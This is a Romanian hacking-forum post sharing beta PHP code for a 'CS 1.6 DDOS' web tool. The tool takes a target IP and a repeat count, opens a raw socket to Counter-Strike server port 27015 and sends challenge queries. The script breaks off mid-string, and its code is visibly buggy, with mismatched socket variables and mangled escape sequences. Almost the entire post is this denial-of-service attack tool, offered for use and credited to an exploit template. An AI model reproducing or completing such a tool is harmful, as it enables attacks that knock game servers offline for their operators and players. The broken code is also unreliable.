Jump to content
Guest

CS DDOS PHP PORTED BETA

Recommended Posts

Uitati o varianta beta... testati si voi ca eu nam cs pe pc o sa il pun maine....

<?

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout", 5);

ob_implicit_flush (1);

echo'<html><head><title> ******* CS 1.6 DDOS **************

</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:

#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img

{background-color:   #FFFFFF   !important}  input  {background-color:    #303030

!important} option {  background-color:   #303030   !important}         textarea

{background-color: #303030 !important} input {color: #1CB081 !important}  option

{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox

{background-color: #303030 !important} select {font-weight: normal;       color:

#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;

background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:

0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em

!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em

!important}  h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em

!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:

normal !important} *{text-decoration: none !important} a:link,a:active,a:visited

{ text-decoration: none; color : #99aa33; } a:hover{text-decoration: underline;

color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;

font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;

font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">

******* CS 1.6 DDOS PORTED TO PHP BY SYSGHOST ************ </p><p class="Stile6">

Visit our homepage <a href="hTTp://Romania.HackTECK.BE"target="_blank">

hTTp://Romania.HackTECK.BE</a> </p> <table  width="84%"><tr><td width="43%">

<form name="form1" method="post"   action="'.$_SERVER[php_SELF].'">    

<input type="text" name="host">  <span class="Stile5">* ip (ex:

127.0.0.1 ) </span></p>

<input type="text" name="time">       <span

class="Stile5"> * de cate ori</span></p>  

 <input   type="submit" name="Submit"

value="HeadShot"></p></form></td></tr></table></body></html>';

print "Made after Rgod's exploit template the best i could find greetz.";

function show($headeri)

{

 $ii=0;$ji=0;$ki=0;$ci=0;

 echo '<table border="0"><tr>';

 while ($ii <= strlen($headeri)-1){

   $dAtAi=dechex(ord($headeri[$ii]));

   if ($ji==16) {

     $ji=0;

     $ci++;

     echo "<td></td>";

     for ($li=0; $li<=15; $li++) {

       echo "<td>".htmlentities($headeri[$li+$ki])."</td>";

 }

     $ki=$ki+16;

     echo "</tr><tr>";

   }

   if (strlen($dAtAi)==1) {

     echo "<td>0".htmlentities($dAtAi)."</td>";

   }

   else {

     echo "<td>".htmlentities($dAtAi)."</td> ";

   }

   $ii++;$ji++;

 }

 for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {

   echo "<td>  </td>";

 }

 for ($li=$ci*16; $li<=strlen($headeri); $li++) {

   echo "<td>".htmlentities($headeri[$li])."</td>";

 }

 echo "</tr></table>";

}

function doit($host){

$socket = socket_create(AF_INET, SOCK_RAW, 2);

socket_connect($sock,$host, 27015);

$string="xffxffxffxffgetchallenge";

print "Sending...";

print show($string);

socket_write($socket, $string);

$trimis = socket_read($socket, 65535);

print "Response:

";

print $trimis;

print "---------------------------------------------------------------------------------";

show($trimis);

$bucati = explode(" ", $trimis);

echo $bucati[0];

$end = '"prot4unique

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...